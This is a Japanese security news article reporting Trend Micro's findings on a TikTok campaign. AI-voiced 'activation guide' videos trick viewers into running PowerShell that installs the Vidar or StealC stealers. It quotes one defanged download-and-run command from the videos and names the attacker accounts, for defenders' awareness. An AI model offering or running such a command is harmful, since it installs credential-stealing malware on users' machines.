ClickFix戦術用いるTikTok動画がスティーラーマルウェアを配布 | Codebook|Security News
Codebook|Security News > Articles > Threat Report > デイリーサイバーアラート > ClickFix戦術用いるTikTok動画がスティーラーマルウェアを配布

デイリーサイバーアラート

Silobreaker-CyberAlert

スティーラー

ClickFix戦術用いるTikTok動画がスティーラーマルウェアを配布

佐々山 Tacos

佐々山 Tacos

2025.05.26

ClickFix戦術用いるTikTok動画がスティーラーマルウェアを配布

Help Net Security – May 23, 2025

TikTokの巨大なユーザーベースを利用してインフォスティーラーマルウェアVidarおよびStealCを配布する新たなソーシャルエンジニアリングキャンペーンについて、トレンドマイクロが報告。このキャンペーンでは、正規ソフトウェアのアクティベート方法の解説などに見せかけた動画を通じてClickFix戦術を使い、ユーザーに有害なPowerShellコマンドを実行するよう仕向けるという。

ClickFixを用いる攻撃では、偽のCAPTCHA画面を使ってユーザーのクリップボードを乗っ取り、悪意あるスクリプトを実行させるという手口が広く使われている。しかし今回トレンドマイクロが報告した新たなキャンペーンは、TikTokの動画内で視聴者を有害コードの実行に導くというもの。具体的には、Windows OSやMicrosoft Office、CapCut、Spotifyなどのソフトウェアのアクティベート手順と称し、以下のステップに従うよう誘導する。この手順で実行されたPowerShellコマンドはリモートのスクリプトをダウンロード・実行し、これによってVidarまたはStealCがダウンロードされる。

  • 「Windows」キーと「R」キーを押す
  • powershellとタイプし、「Enter」キーを押す
  • 次のようなコマンドを実行する:irm hxxps://allaivo[.]me/spotify(Spotifyに見せかけたソフトウェアアクティベート手順動画の場合の例)

こうした動画を公開していたTikTokアカウントは複数確認されている(@gitallowed、@zane.houghton、@allaivo2、@sysglow.wow、@alexfixpc、@digitaldreams771)が、どの動画もカメラアングルやPowerShellに使用されるダウンロードURLが微妙に異なるだけで、その他の点は非常に似通っているという。また、動画の音声もAIで生成されている模様。このことから、トレンドマイクロはこれらの動画がAIツールを使って作成されたものである可能性が高いとしている。いずれの動画でもユーザーの誘導は音声を通じて行われており、TikTokプラットフォーム上に検出可能な有害コードやスクリプトが仕込まれているわけではない。トレンドマイクロは、「脅威アクターらはこれを既存の検出メカニズムの回避を試みるために行なっている」と説明。これにより、防御側がこうしたキャンペーンを検出・妨害するのがより難しくなるとした。

このキャンペーンの動画のうち1つは約50万回ほど再生されるなど、TikTokのアルゴリズムの働きにより悪意ある動画であっても幅広いユーザーの目に触れるポテンシャルを秘めている。こうした攻撃のリスクを軽減するにあたり、トレンドマイクロは、特にAI生成のコンテンツに対するセキュリティ意識を高めることが絶対的に必要であると指摘。加えて、PowerShellやその他のシステムユーティリティが関わる普通でないコマンド実行が行われないかモニタリングすることも、悪意ある活動の早期検出に役立つと述べた。同社のレポート記事では、さらに詳しい攻撃チェーンやIoCなどが共有されている。

Eブック無料配布中:Codebook 2024 ~サイバーセキュリティ分析レポート~

Codebookの記事が、Eブックになりました。サイバーセキュリティの2024年を振り返る本書では、昨年1年間を通じてCodebookで発信した重要なニュースの数々とそこから得られる教訓や知見を、弊社インテリジェンスアナリストの見解とともに紐解いていきます。

無料ダウンロードはこちらのバナーから:

目次

第1章:脅威ランドスケープの急速な変化:波乱のランサムウェア情勢と新たに報告された攻撃手法

第2章:世界情勢や地政学がサイバーセキュリティにもたらす影響

第3章:スティーラーの急成長と認証情報の漏洩が生むリスク

第4章:サプライチェーンリスク

第5章:2024 年に組織を脅かした脆弱性

Special Feature特集記事

Cyber Intelligenceサイバーインテリジェンス

Security情報セキュリティ